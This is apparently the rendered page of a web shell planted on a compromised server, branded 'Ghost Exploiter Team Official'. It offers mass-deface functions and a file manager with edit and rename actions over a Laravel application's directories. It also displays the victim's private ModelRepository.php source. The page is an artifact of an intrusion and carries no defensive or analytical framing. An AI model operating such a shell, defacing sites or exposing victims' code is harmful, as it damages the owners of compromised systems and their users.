Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Repositories
/
Model
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Interfaces
--
ren
CqrsServiceProvider.php
1.188KB
edt
ren
Dto.php
6.402KB
edt
ren
ModelRepository-2026012
...
1.382KB
edt
ren
ModelRepository-2026012
...
1.382KB
edt
ren
ModelRepository.php
1.382KB
edt
ren
PaginationDto.php
0KB
edt
ren
Permission.php
0.239KB
edt
ren
ResponseDto.php
1.147KB
edt
ren
TokenResponse.php
1.604KB
edt
ren
accounts.php
0.905KB
edt
ren
app.php
4.229KB
edt
ren
auth-20260128133140.php
3.935KB
edt
ren
auth.php
3.935KB
edt
ren
<?php namespace App\Repositories\Model; use App\Models\Account; use App\Models\Counterparty; use App\Models\Organization; use App\Models\System; use App\Repositories\Model\Interfaces\ModelInterface; use Illuminate\Support\Collection; class ModelRepository implements ModelInterface { public function getAccounts(int $modelId, $archive) { return Account::query()->where(['model_id' => $modelId, 'archived' => $archive])->with(['organization', 'payments'])->get(); } public function getCashAccounts(int $modelId, bool $isCash, bool $archive = false) { return Account::query()->where(['model_id' => $modelId, 'is_cash' => $isCash, 'archived' => $archive])->with(['organization', 'payments'])->get(); } public function getCounterparties($modelId, $archive) { return Counterparty::query()->where(['model_id' => $modelId, 'archived' => $archive])->get(); } public function getOrganizations($modelId, $archive) { return Organization::query()->where(['model_id' => $modelId, 'archived' => $archive])->get(); } public function getModel(int $modelId) { return System::query()->findOrFail($modelId); } public function getAll(): Collection { return System::query()->get(); } public function update(int $modelId, array $data) { return System::find($modelId)->update($data); } }
<=Back
Liking